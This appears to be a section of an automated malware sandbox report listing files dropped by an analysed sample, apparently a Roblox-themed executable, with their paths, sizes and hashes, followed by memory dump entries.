5ed67a312677428b2498c2516eec12ed3ec835b3944bba3496f0dfabb4ac57f501d144ad26773f0a85410dd4543751db5f5ec667bf1bd44ba84de90b778f8048

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\Files.docx
Filesize
11KB

MD5
4a8fbd593a733fc669169d614021185b

SHA1
166e66575715d4c52bcb471c09bdbc5a9bb2f615

SHA256
714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

SHA512
6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\Opened.docx
Filesize
11KB

MD5
bfbc1a403197ac8cfc95638c2da2cf0e

SHA1
634658f4dd9747e87fa540f5ba47e218acfc8af2

SHA256
272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

SHA512
b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\Recently.docx
Filesize
11KB

MD5
3b068f508d40eb8258ff0b0592ca1f9c

SHA1
59ac025c3256e9c6c86165082974fe791ff9833a

SHA256
07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7

SHA512
e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\These.docx
Filesize
11KB

MD5
87cbab2a743fb7e0625cc332c9aac537

SHA1
50f858caa7f4ac3a93cf141a5d15b4edeb447ee7

SHA256
57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023

SHA512
6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\LockExit.mp3
Filesize
171KB

MD5
c879b4d9245e93b694281457974f7eac

SHA1
dff95c090a43ef327b09f223504eacd4a1590dd4

SHA256
5f9dc95e57639a0ea0fb30dd77c7dce5449877cdb77f1aca2b5f010b0956f028

SHA512
c1523aba1caa93ae90bac2f3f8aeae853e59edf3c60f13be987fa6fe2ad6fac116c7344c73bac4c016af3a573eee81d295560da67d797951ded220862bd5f14d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Music\ImportBackup.dotx
Filesize
583KB

MD5
82fe6eedaf35f2ffa6a11725fb8c2fde

SHA1
2eaee9b4db414272a7e77cda84fbee23ce45f343

SHA256
4a8bac38ef5586ad69d5a0283e7e01abf79ac493cfb763c0f8d4ebfa6b5c3eb8

SHA512
986ad0627f55f874c074ef9b8e87f73f76029f822a498506ef205fa3fa375ed1bcd7b142dd79d63eeccd51c94b2abe9eee61c07e398cb907443fea2cde7d6aed

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Music\InitializeExit.jpeg
Filesize
369KB

MD5
403f53071d642aae3b936d2bc5a7e7f4

SHA1
63f345cb155b77de4e84018b95169c5b115efc44

SHA256
b491b8cef29ce1da26c1a33de9d458323d1c89cda554b98707608635d7d977e0

SHA512
7eade6cf9569dff53f75d22b4127b28ffdaab19ae0deb10b9850e7ac3264d24e77631433c6fae3e9a65fba2be9b6d3d5cc9cb65cef4fb70bc2c4abbc56720ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Music\RestoreUnregister.mp3
Filesize
344KB

MD5
6f30497920da5a6b2dfcf0a75460361f

SHA1
4f033fbe19ba663f059699ce4916f0510ae71ed6

SHA256
ed92b25c25cac1015acd98e917338013c39d1cd85462d044c5dd6308f676a1a8

SHA512
96c391d322b07b6706b525206f4cbe52e7503222c13dae983c632d0c47243f7ab5099302cf09d0bff09fc178e96fe9614891385869ac78ba6b656bbfcbdb5b7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Music\SaveOut.csv
Filesize
407KB

MD5
6e159083021e2d6a61b2b9cb0437d3c5

SHA1
0a3408348b53f4e640d4838c23eec73b9f979021

SHA256
ad8319fa311cd4002af4907965f58406ea6318a388dbb804dcd855b4edebb772

SHA512
ed53c012627eae74f157bafe5f444bed38f5b44f43488f5900c8118478035555ca67de19ae79128dd78d30cee1ff1d08583129e623d33d5f2aa6a01e23664dbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Music\StartRegister.png
Filesize
394KB

MD5
9405cc7bb481de991c8b8d9ef30be171

SHA1
2bb423fec345d590297ea1518306b3828f0e5edb

SHA256
4c02cd2a498d999d2d1278e203c65d18336510647dfc9737dae053cbc3700ae5

SHA512
8e34001eba4faf5b36b8d60b0225740bf38c05b7f7f857c98fc1937afd8d16dea29fd7bc099e98c9d7d41dfccbcc3b2761b64a4eaa8ff2af69fe7927d93bd877

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Pictures\ExportBackup.wmf
Filesize
280KB

MD5
75387e7fbf081148e2c9b05f75e82d08

SHA1
1225d07122777ba469cac010e5cf0018f4bf9c60

SHA256
e7225e15ca3c7e1b98b4a3125e2c6a168d35ccc8efd884a389de5e962fd74e2f

SHA512
4e15429bfbfa929fb42affc5a362396bf00e5dc8e19926196c11f7958b858bdbf49e9636017616ab34565f101f4ab0fd4ee1ec381e484b0887ab67baeee5d5d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Pictures\ExportConnect.jpg
Filesize
560KB

MD5
6d88a1111938a1841471160a3eded7b5

SHA1
8f0e4c4f637365acb3c29721b3b8c2589b2c74b1

SHA256
15984d9bda3118a30214d00b6a983100a8d3c8bfecefb8319fbfda811ac3db06

SHA512
78def8942b0b257ee0f5da3dafd7f7d3f75fa1a2efa541ffd2e80c060d04e7bd23c6eabc1763bb5d693b6a6a5d67eb6cd91784105470629670b243859f84f6d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Pictures\My Wallpaper.jpg
Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Pictures\RegisterPush.jpeg
Filesize
868KB

MD5
a466132d8bd08a9782d55356c606c5c9

SHA1
c1c31d8b28b049e888133ddd8c456c14ae649ddf

SHA256
121cd30c4fea0127c9191a6f664b879ca084f3dff8a9bed2da92a2c4dd2cd6ce

SHA512
da7a0a1fa3a66704514fcc4ed5278cd1c847c625315346a7e1fdf49e24feec82d9b2c79902137031f4192298cb8d20ac380f14477a51f940aa3bcbaf67cc46ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Pictures\TracePublish.jpeg
Filesize
308KB

MD5
3bff1c9e2c1647e7972ec95ce17c3e62

SHA1
b5ffbd32d5667862307a183ea7c3f21a7081cf3e

SHA256
40e00530dc9babb8e7bd023c85837dfa7bc5102c85f04725f6603653a630f179

SHA512
1ba36692bc91a9365ca886a79b232894086a6278a4a408037dd468201314ad5364e7a89c69b502905cf6dbb048c5dd20b0a549e33ab4623afad104871512b6c7

Download Submit
C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
Filesize
8.5MB

MD5
f4e7c9f3ccbfa8b69710d9ae6ca205cc

SHA1
dfb2521d16f11c9a46c63f57af540865d8bc7e14

SHA256
e71d605b48b66bc4b46eea37119e0a1ea7df6ab98104fb679ae1a42711a6740b

SHA512
131474b93dd6f15b09595239194278d5ef0eb897480d29fb095283e242ca18766808ee39384e29031763aa61d3fbeb7b51ffba3c4c892fecc997e368b8458101

Download Submit
memory/428-112-0x00000199C13C0000-0x00000199C13E2000-memory.dmp

Filesize
136KB

Download
memory/928-847-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-846-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-845-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-838-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-839-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-840-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-844-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-843-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/928-842-0x00000226B2B70000-0x00000226B2B71000-memory.dmp

Filesize
4KB

Download
memory/2932-628-0x00000138411E0000-0x00000138411E8000-memory.dmp

Filesize
32KB

Download
memory/4032-486-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-481-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-480-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-482-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-484-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-487-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-488-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-489-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/4032-485-0x00000204F0280000-0x00000204F0281000-memory.dmp

Filesize
4KB

Download
memory/5144-434-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-441-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-440-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-442-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-443-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-444-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-445-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-435-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-436-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5144-446-0x000001CA7CD70000-0x000001CA7CD71000-memory.dmp

Filesize
4KB

Download
memory/5396-232-0x0000020E3E370000-0x0000020E3E378000-memory.dmp

Filesize
32KB

Download